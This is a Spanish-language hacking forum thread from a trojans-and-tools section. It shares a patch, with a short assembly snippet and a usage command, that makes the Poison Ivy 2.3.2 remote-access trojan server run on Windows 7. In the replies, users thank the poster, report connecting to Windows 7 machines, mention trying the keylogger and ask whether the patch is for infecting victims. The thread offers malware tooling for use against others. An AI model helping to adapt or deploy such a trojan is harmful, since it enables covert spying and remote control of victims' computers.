Imagen

Mirando por ahi encontre esto. Es un parche para Poison Ivy 2.3.2 para que funcione y sea compatible con Windows 7.
espero que les sea de su agrado
This patch the Poison ivy server for run in windows 7 :P

Use:

PATCHPI.exe -f %s

[Enlace externo eliminado para invitados]

Código: Seleccionar todo

/*400274*/  XOR BYTE PTR DS:[EAX],AL
/*400276*/  ADD BYTE PTR DS:[EAX],AL
/*400278*/  MOV ESI,DWORD PTR DS:[ESI+C]
/*40027B*/  MOV ESI,DWORD PTR DS:[ESI+1C]
/*40027E*/  MOV EDX,DWORD PTR DS:[ESI+8]
/*400281*/  MOV EDI,DWORD PTR DS:[ESI+20]
/*400284*/  MOV ESI,DWORD PTR DS:[ESI]
/*400286*/  CMP DWORD PTR DS:[EDI+C],320033
/*40028D*/  JNZ SHORT LOCALHOS.0040027E
/*40028F*/  MOV DWORD PTR SS:[EBP-4C1],EDX
/*400295*/  RETN

By SecMAM

thnks Hacker_Zero
ANTRAX
Muy bueno,al estar el servidor en assembler se pudo adaptar eso
Gracias ANTRAX!

Salu2
Blog técnico dedicado a la seguridad informática y al estudio de nuevas vulnerabilidades.
Blog: http://www.seginformatica.net
Twitter: https://twitter.com/#!/p0is0nseginf
muy, muy bueno ANTRAX vamos a probar a ver si ahora funciona bien el keylogger gracias bro!

SALUDOS!!
Soy un camaleón, en tu cama, leona ♪
Gracias ANTRAX, justo lo que preguntaba el en foro de "Dudas y Preguntas". Lo he probado y me conecta en un Win 7 32 bits parcheando el server. Ahora mirare si el server es estable. Puede alguien comprobar si funciona en versiones de 64 bits?
muy buen aporte.....gracias antrax por tomarte tal tiempo y dedicarnos algo necesario y muy util.

PD:rafaelxulo,deveras que esa firma es algo desagradable....tantas cosas lucrativas
que existen y vos colocas eso...."ahora entiendo a martir,cuando se referia a esos temas.
wau esto es lo que es esperado ver ase mucho timpo me gusta mucho este rat y lo unico malo ke le beia era que no conectava en seven muchas gracias bro lo probare
Imagen
Uff aportazo, sobre todo por la idea para los codders.
La felicidad es una cualidad evasiva. Si la buscas, no la encuentras.
Imagen
woons escribió:Gracias ANTRAX, justo lo que preguntaba el en foro de "Dudas y Preguntas". Lo he probado y me conecta en un Win 7 32 bits parcheando el server. Ahora mirare si el server es estable. Puede alguien comprobar si funciona en versiones de 64 bits?

A mi no me va , me pone ha detectado un error y debe cerrarse :(
perdonad pero tengo una duda.. este patch que es para poder utilizar poison con windows 7 ? o para q funcione infectando una victima con w7 ?
Responder

Volver a “Troyanos y Herramientas”